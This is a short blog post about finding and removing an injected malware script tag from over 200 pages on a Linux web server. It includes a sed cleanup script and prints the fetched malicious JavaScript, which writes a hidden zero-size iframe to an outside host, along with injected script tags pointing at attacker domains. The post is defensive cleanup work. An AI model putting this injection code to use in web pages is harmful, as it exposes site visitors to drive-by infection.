Malware Attack

Last Wednesday, my colleague was telling me that one of our servers was attacked by Malware and his Firefox 3 browser "Reported Attack Site!"

I was wondering how they know that our server is suspected of malware attack. After some Googling, I found the following articles to be very useful in understanding this new type of attack called Drive-by Download

• All Your iFRAMEs Point to Us
• Know Your Enemy: Malicious Web Servers
• Strider HoneyMonkeys: Active, Client-Side Honeypots for Finding Malicious Websites

Basically a couple of ways to embed malware script in your server via:

• public forum that allow users to embed any HTML codes such as IFRAME, SCRIPT
• advertisements to untrusted content, difficult to maintain trust along such long advertisement delivery chains
• exploit vulnerability in the browser or one of its plugins
• exploit vulnerability in the server

Today, my boss was telling us that the Linux server is under malware attack and asked whether I 'know' Linux. Whenever people ask whether I 'know' something, I need them to define what is 'know'. Anyway, this is a golden opportunity for me to have first hand 'encounter' with Malware. After some traversing the directory, I found 200+ web pages has the this javascript embedded at the end of pages
<script src=http://www.kr92.ru/fgg.js></script>
This pattern tallies with what the above articles described. It is time to clean up all these pages. I remember this blog showed a very handy way to edit file using sed without having to create temporary file. "-i" flag in sed allows you to edit the file directory (FYI, sed in Solaris does not have this flag available). Here is my on-the-fly created script:

#! /bin/sh

for i in `find . -type f \( -name "*.html" -o -name "*.htm" \)`
do
        grep "www.kr92.ru" $i > /dev/null 2>&1
        if [ $? -eq 0 ]; then
                echo "Removing www.kr92.ru - $i ..."
                sed -i -e 's#<script src=http://www.kr92.ru/fgg.js></script>##' $i
                grep "www.kr92.ru" $i > /dev/null 2>&1
                if [ $? -eq 0 ]; then
                        echo Unsuccessful
                else
                        echo OK
                fi
        fi
done

Wanna to find out what is inside http://www.kr92.ru/fgg.js

$ curl http://www.kr92.ru/fgg.js
window.status="";
n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN")&&(n!="ZH-MO")&&(n!="ZH-HK")&&(n!="BN")&&(n!="GU")&&(n!="NE")&&(n!="PA")&&(n!="ID")&&(n!="EN-PH")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="VI")){
var cookieString = document.cookie;
var start = cookieString.indexOf("v1goo=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+9*3600*1000);
document.cookie = "v1goo=update;expires="+expires.toGMTString();
try{
document.write("<iframe src=http://ojns.ru/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
}
catch(e)
{
};
}}

Apparently it is trying to include an IFRAME (http://ojns.ru/cgi-bin/index.cgi?ad) with zero width by zero height in your page.

According to this article, it reported 200+ different form of script references. Scary, isn't it. While I was writing this blog, my boss told me that the main page has this embedded.
<script src=http://www.8hcs.ru/js.js></script>

Likely I have to modify my script to cater for various forms of script reference, some regular expression matching to catch all those culprits.